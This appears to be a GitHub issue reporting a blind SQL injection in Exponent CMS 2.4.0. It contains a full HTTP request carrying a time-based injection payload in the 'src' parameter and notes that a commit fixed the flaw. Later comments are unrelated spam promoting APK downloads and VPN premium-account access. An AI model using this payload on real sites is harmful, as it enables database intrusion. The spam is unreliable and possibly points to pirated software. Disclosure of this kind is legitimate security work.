exponentcms / exponent-cms

Content Management, Simple.
exponentcms.org
GNU General Public License v2.0
60 stars 24 forks source link

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0 (5) #1438

Closed exponentcms closed 4 years ago

exponentcms commented 4 years ago

POST /exponent/ HTTP/1.1 Content-Length: 251 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://192.168.118.1:80/exponent/ Cookie: PHPSESSID=f7859e8215b717f81b7dbd2e2c1a2caa; adminer_key=cdeaea5d52a8f402a28bd04980a7851b Host: 192.168.118.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: /

action=manage_ranks&controller=container&lastpage=http://192.168.118.1/exponent/&model=container&rerank%5b%5d=16&src=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

exponentcms commented 4 years ago

Appears to be a duplicate of #1394

exponentcms commented 4 years ago

(from [fffb2038de4c603931b785a4c3ec69cfd06181ba]) fix sql injection security vulnerability; reported by Nicky [#1394 state:resolved] [#1395 state:resolved] https://github.com/exponentcms/exponent-cms/commit/fffb2038de4c603931b785a4c3ec69cfd06181ba

exponentcms commented 4 years ago

Thank you so much. It really helped me to resolve the issue. Here download latest showbox apk file. Thanks.

exponentcms commented 4 years ago

192.168.1.1 Admin You can configure modem with this ip address

exponentcms commented 4 years ago

https://techranc.com/droid-vpn-premium-account/ So these are the methods you can use to get access to the Droid VPN premium account. You can use the premium account of DroidVPN Premium on both rooted and un-rooted Android devices using the methods that are mentioned above.

also, Google Services APK Download Latest Version [Google Services Framework] https://www.techavy.com/google-play-services-apk-download/

exponentcms commented 4 years ago

Lighthouse URL: https://exponentcms.lighthouseapp.com/projects/61783/tickets/1395